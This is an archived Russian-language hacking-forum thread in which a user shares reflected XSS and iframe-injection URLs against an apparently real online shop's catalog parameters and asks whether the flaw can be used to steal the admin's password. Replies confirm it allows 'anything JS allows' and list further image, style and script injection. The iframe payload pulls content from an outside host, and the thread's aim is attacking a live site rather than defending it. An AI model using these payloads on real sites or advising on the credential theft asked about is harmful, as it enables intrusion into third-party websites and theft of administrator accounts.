Просмотр полной версии : Вопрос по Xss
.SpoilerTarget" type="button">Spoiler: Get запрос
catalog/?firm=%27"-->alert(0x0001B6)
В общем такой вопрос что можно сделать с этой Xss ?
http://s8.hostingkartinok.com/uploads/images/2016/04/faa33c6514b84278e204f03000d0f5b9.png
Так же есть уязвимость frame injection
Url http://site.ru/catalog/?collection= (http://myprintbar.ru/catalog/?collection=%3ciframe%20src%3d%22http%3a%2f%2fr87. com%2f%3f%22%3e%3c%2fiframe%3e)
Parameter Type GET
все то же, что и с другими xss
↑ (https://antichat.live/posts/3973429/)
все то же, что и с другими xss
Можно украсть пароль админа или тип того ?
примерно все то же, что позволяет делать JS
M_script
14.04.2016, 08:15
↑ (https://antichat.live/posts/3973421/)
Так же есть уязвимость
frame injection
Url
http://site.ru/catalog/?collection= (http://myprintbar.ru/catalog/?collection=%3ciframe%20src%3d%22http%3a%2f%2fr87. com%2f%3f%22%3e%3c%2fiframe%3e)
Parameter Type GET
Там еще image injection
http://site.ru/catalog/?collection=
style injection
http://site.ru/catalog/?collection=
И script injection
http://site.ru/catalog/?collection=
Короче, ты полностью сломал этот сайт.
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot